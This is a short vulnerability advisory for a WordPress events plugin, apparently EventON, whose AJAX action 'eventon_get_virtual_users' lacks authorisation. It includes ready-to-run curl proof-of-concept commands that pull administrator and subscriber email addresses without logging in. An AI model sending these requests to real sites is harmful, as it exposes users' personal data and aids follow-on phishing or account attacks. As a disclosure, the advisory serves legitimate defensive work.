Description The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog
To get the administrator user emails: curl -X POST --data ‘_user_role=administrator’ ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users’ To get the subscriber user emails: curl -X POST --data ‘_user_role=subscriber’ ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users’ etc to get others